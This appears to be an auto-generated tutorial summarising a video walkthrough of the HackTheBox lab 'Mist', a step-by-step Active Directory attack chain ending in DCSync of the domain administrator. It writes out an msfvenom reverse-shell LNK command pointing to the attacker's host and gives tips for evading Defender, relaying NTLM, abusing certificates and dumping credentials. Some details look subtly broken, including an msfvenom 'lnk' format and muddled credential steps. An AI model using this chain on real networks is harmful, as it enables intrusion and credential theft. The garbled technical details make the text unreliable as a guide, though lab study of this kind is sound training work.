HackTheBox - Mist

Introduction

This tutorial provides a comprehensive step-by-step guide based on the HackTheBox - Mist video by IppSec. It focuses on exploiting vulnerabilities, obtaining remote code execution (RCE), and utilizing tools like Bloodhound, Certipy, and Impacket. Each step outlines practical actions and tips to help you navigate the process effectively.

Step 1: Perform Initial Scanning with Nmap

• Start by running an Nmap scan to identify open ports and services on the target machine.
• Use the following command to scan for service versions:

  nmap -sV <target_ip>
  

• Look for the service version that may indicate vulnerabilities, such as the pluck version mentioned in the video.

Step 2: Investigate Vulnerabilities

• Research any identified vulnerabilities, such as CVE-2024-9405 (File Disclosure).
• Cross-reference the CVE database to understand the implications and potential exploits.

Step 3: Cracking Passwords and Uploading Malicious Plugins

• Discover backup passwords from the target.
• Use a password cracker (e.g., John the Ripper) to crack the password.
• Upload a malicious plugin to gain RCE:
  • Ensure the plugin is designed to execute arbitrary commands.

Step 4: Bypass Defender's Reverse Shell Protection

• If the reverse shell is blocked, obfuscate your command to evade detection.
• Use techniques like URL encoding or command splitting.

Step 5: Create a Malicious LNK File

• Develop a malicious LNK file that, when clicked, provides a shell.
• Use tools like msfvenom to create the LNK file:

  msfvenom -p windows/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f lnk -o malicious.lnk
  

Step 6: Set Up Bloodhound

• Install Bloodhound Community Edition to visualize Active Directory environments.
• Fix any bugs preventing images from displaying.
• Use Bloodhound to identify certificate templates for enrollment.

Step 7: Discover Defender Exclusions

• As a low-privilege user, read the event log (Event ID 5007) to find Defender exclusions.
• This information can help you strategize your attacks.

Step 8: Request Certificates Using Certify

• Use Certify to request a certificate for your user.
• Then, utilize Rubeus to perform a pass-the-ticket attack to obtain NTLM hashes.

Step 9: Execute NTLM Relay Attacks

• Install Impacket with the necessary version for shadow credentials in LDAP.
• Set up ntlmrelayx to forward connections to the Domain Controller’s LDAP.

Step 10: Use PetitPotam for Authentication

• Utilize PetitPotam with the hash of the user (e.g., Brandon) to authenticate against MS01$.
• Ensure the Webclient Service is running for proper functionality.

Step 11: Shadow Credentials and Impersonation

• Set shadow credentials for MS01$.
• Use S4U to impersonate an administrator and access the filesystem.
• Dump local hashes using the secretsdump tool:

  secretsdump.py -sam <sam_file> -system <system_file> -ntds <ntds_file>
  

Step 12: Cracking Keypass Database

• Locate a Keypass database in the target's directory and use tools to crack it.

Step 13: Analyze Permissions with Bloodhound

• Return to Bloodhound to check if OP_SHARON.MULLARD can read GMSA passwords.
• Use nxc to dump SVC_CA$ credentials.

Step 14: Chain Privilege Escalation

• Investigate what SVC_CA$ can do and find a method to jump through groups to access the Backup Service.

Step 15: Set Shadow Credentials for SVC_CABACKUP

• Use PyWhisker to set shadow credentials on SVC_CABACKUP.
• Use PKINITTools to obtain the NTHASH of SVC_CABACKUP.

Step 16: Create Certificates with Certipy

• Use Certipy to create a certificate for ManagerAuthentication to join the Certificate Managers Group.
• Also, create a certificate for BackupSvcAuthentication to join the ServiceAccounts Group.

Step 17: Dump the Domain Controller Registry

• Use Impacket to dump the registry of the Domain Controller and grab the DC01$ password.
• If facing issues with SMB server writing, write to SYSVOL, then copy to the web server.

Step 18: Use Secretsdump for Final Credential Extraction

• Finally, grab the DC01$ password with secretsdump from the SAM dump.
• Use this password to run DCSync and retrieve the MIST.HTB\Administrator account credentials.

Conclusion

In this tutorial, we've covered a series of steps to exploit vulnerabilities, escalate privileges, and extract sensitive information from a target system. Each step builds on the previous one, demonstrating a methodical approach to penetration testing. As you practice these techniques, always ensure you're operating within legal boundaries and ethical guidelines.